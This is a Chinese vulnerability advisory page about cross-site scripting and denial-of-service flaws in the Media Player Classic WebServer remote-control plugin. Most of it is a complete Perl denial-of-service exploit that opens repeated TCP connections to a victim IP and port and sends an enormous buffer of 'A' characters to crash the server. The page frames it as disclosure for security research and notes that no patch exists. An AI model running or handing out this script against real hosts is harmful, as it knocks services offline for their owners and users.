首页 / 操作系统 / Linux / Media Player Classic WebServer跨站脚本执行和拒绝服务漏洞
发布日期:2012-11-16 更新日期:2012-11-19受影响系统: guliverkli Media Player Classic 6.4.9.1 guliverkli Media Player Classic 1.5 2827 guliverkli Media Player Classic 1.3.1752 0 guliverkli Media Player Classic 1.3.1333 0 guliverkli Media Player Classic 1.3.2189.0 guliverkli Media Player Classic 1.3.1774 0 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 56567Media Player Classic (MPC) WebServer是基于Web的远程控制插件,属于Media Player Classic。Media Player Classic WebServer在实现上存在跨站脚本执行漏洞和拒绝服务漏洞,攻击者可利用这些漏洞造成拒绝服务或在受影响站点的用户浏览器中执行任意代码。<*来源:X-Cisadane *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/perl use IO::Socket::INET; use Getopt::Std; use Socket; my $SOCKET = ""; $loop = 1000; $ip = $ARGV[0]; $port = $ARGV[1]; if (! defined $ARGV[0]) { print " *=============================================================*
"; print " * --- MPC WebServer Remote Denial Of Service ---*
"; print " * --- By : X-Cisadane ---*
"; print " * --- ------------------------------------------------ ---*
"; print " * --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*
"; print " * --- ---*
"; print " *=============================================================*
"; print "
"; print " Ex : perl exploitmpc.pl 127.0.0.1 13579
"; print "Default Port for MPC Web Server is 13579
";
exit; }print " *=============================================================*
"; print " * --- MPC WebServer Remote Denial Of Service ---*
"; print " * --- By : X-Cisadane ---*
"; print " * --- ------------------------------------------------ ---*
"; print " * --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*
"; print " * --- ---*
"; print " *=============================================================*
"; print "
"; print " Ex : perl exploitmpc.pl 127.0.0.1 13579
"; print "Default Port for MPC Web Server is 13579
"; print "
"; print " Please Wait Till The Buffer is Done
"; my $b1 = "x41" x 100000000;$iaddr = inet_aton($ip) || die "Unknown host: $ip
"; $paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!
"; $proto = getprotobyname("tcp") || die "getprotobyname: $!
";print "
"; print " Attacking the Target, Please Wait Till Pwned
";for ($j=1;$j<$loop;$j++) { socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!
"; connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!
";$DoS=IO::Socket::INET->new("$ip:$port") or die; send(SOCKET,$b1, 0) || die "failure sent: $!
";print $DoS "stor $b1
"; print $DoS "QUIT
";close $DoS; close SOCKET; } # exit :建议: -------------------------------------------------------------------------------- 厂商补丁:guliverkli ---------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://guliverkli.sourceforge.net/BugTracker.NET 多个安全漏洞Adobe InDesign Server "RunScript" SOAP消息远程命令执行漏洞相关资讯 跨站脚本执行漏洞和拒绝服务漏洞 本文评论 查看全部评论 (0)